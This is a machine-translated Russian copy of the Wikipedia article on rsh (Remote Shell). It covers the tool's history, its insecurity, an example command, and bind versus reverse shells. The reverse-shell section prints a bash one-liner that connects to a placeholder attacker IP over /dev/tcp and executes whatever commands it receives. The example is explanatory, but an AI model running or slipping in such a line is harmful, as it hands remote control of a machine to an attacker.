Jump to content

Удаленная оболочка

удаленная оболочка (rsh)
Первоначальный выпуск 1983 год ; 41 год назад ( 1983 )
Написано в С
Операционная система Кросс-платформенный

( Удаленная оболочка rsh ) — это командной строки компьютерная программа , которая может выполнять команды оболочки от имени другого пользователя и на другом компьютере в компьютерной сети .

Удаленная система, к которой подключается rsh , запускает rsh демон (rshd). Демон обычно использует 513 известного протокола управления передачей (TCP) порт .

Rsh возник как часть BSD Unix операционной системы , наряду с rcp , как часть пакета rlogin в версии 4.2BSD в 1983 году. С тех пор rsh был портирован на другие операционные системы.

The rsh Команда имеет то же имя, что и другая распространенная утилита UNIX, ограниченная оболочка , которая впервые появилась в PWB/UNIX ; в System V Release 4 ограниченная оболочка часто располагается по адресу /usr/bin/rsh.

Как и другие r-команды Berkeley , которые включают аутентификацию пользователя, протокол rsh небезопасен незашифрованную для использования в сети, поскольку, среди прочего, он отправляет . информацию по сети Некоторые реализации также аутентифицируются путем отправки незашифрованных паролей по сети. rsh в значительной степени был заменен программой Secure Shell (ssh), даже в локальных сетях. [1] [2]

В качестве примера использования rsh следующий пример выполняет команду mkdir testdir от имени пользователя удаленного пользователя на компьютере host.example.com , на котором работает UNIX-подобная система:

$ rsh -l remoteuser host.example.com "mkdir testdir"

После завершения команды rsh завершается. Если команда не указана, rsh войдет в удаленную систему с помощью rlogin . Сетевое расположение удаленного компьютера определяется с помощью системы доменных имен .

Установка

[ редактировать ]

Команда для установки клиента rsh с помощью apt

# apt-get install rsh-redone-client

Связать оболочку и перевернуть оболочку

[ редактировать ]

Сеанс удаленной оболочки может быть инициирован либо локальным устройством (которое отправляет команды), либо удаленным устройством (на котором выполняются команды). [3] В первом случае удаленная оболочка будет называться привязкой оболочки, во втором случае — обратной оболочкой. [4]

Обратную оболочку можно использовать, когда устройство, на котором должна быть выполнена команда, недоступно напрямую — например, для удаленного обслуживания компьютеров, расположенных за NAT, к которым невозможно получить доступ извне. [5] [6] Некоторые эксплойты создают обратную оболочку от атакованного устройства обратно на машины, контролируемые злоумышленниками (так называемая «атака с обратной оболочкой»). Следующий код демонстрирует обратную атаку оболочки: [7]

$ exec 5<>/dev/tcp/<attacker_IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; done

Он открывает TCP-сокет для IP-адреса злоумышленника на порту 80 в качестве файлового дескриптора . Затем он неоднократно считывает строки из сокета и запускает строку, передавая стандартный вывод и стандартный поток ошибок обратно в сокет. Другими словами, он предоставляет злоумышленнику удаленную оболочку на машине.

См. также

[ редактировать ]
  1. ^ «SSH, Secure Shell: полное руководство» . www.researchgate.net . Архивировано из оригинала 11 ноября 2023 г. Проверено 11 ноября 2023 г.
  2. ^ «Протокол Secure Shell – все, что вам нужно знать» . dev.to. ​Проверено 11 ноября 2023 г.
  3. ^ «Безопасная оболочка (SSH)» . www.techtarget.com . Архивировано из оригинала 11 ноября 2023 г. Проверено 11 ноября 2023 г.
  4. ^ «Разница между Bind Shell и Reverse Shell» . www.geeksforgeeks.org . Архивировано из оригинала 11 ноября 2023 г. Проверено 11 ноября 2023 г.
  5. ^ «Что такое обратная оболочка?» . www.techslang.com . Проверено 11 ноября 2023 г.
  6. ^ «Эволюция удаленной оболочки и уровни безопасности юридического программного обеспечения на основе браузера» . www.lawsupport.com.au . Архивировано из оригинала 11 ноября 2023 г. Проверено 11 ноября 2023 г.
  7. ^ «Что такое обратная оболочка?» . Сисдиг . Архивировано из оригинала 28 ноября 2023 г. Проверено 28 ноября 2023 г.
Arc.Ask3.Ru: конец переведенного документа.
Arc.Ask3.Ru
Номер скриншота №: 7b67cc9321182b2680b25ce93cdd5d72__1719840360
URL1:https://arc.ask3.ru/arc/aa/7b/72/7b67cc9321182b2680b25ce93cdd5d72.html
Заголовок, (Title) документа по адресу, URL1:
Remote Shell - Wikipedia
Данный printscreen веб страницы (снимок веб страницы, скриншот веб страницы), визуально-программная копия документа расположенного по адресу URL1 и сохраненная в файл, имеет: квалифицированную, усовершенствованную (подтверждены: метки времени, валидность сертификата), открепленную ЭЦП (приложена к данному файлу), что может быть использовано для подтверждения содержания и факта существования документа в этот момент времени. Права на данный скриншот принадлежат администрации Ask3.ru, использование в качестве доказательства только с письменного разрешения правообладателя скриншота. Администрация Ask3.ru не несет ответственности за информацию размещенную на данном скриншоте. Права на прочие зарегистрированные элементы любого права, изображенные на снимках принадлежат их владельцам. Качество перевода предоставляется как есть. Любые претензии, иски не могут быть предъявлены. Если вы не согласны с любым пунктом перечисленным выше, вы не можете использовать данный сайт и информация размещенную на нем (сайте/странице), немедленно покиньте данный сайт. В случае нарушения любого пункта перечисленного выше, штраф 55! (Пятьдесят пять факториал, Денежную единицу (имеющую самостоятельную стоимость) можете выбрать самостоятельно, выплаичвается товарами в течение 7 дней с момента нарушения.)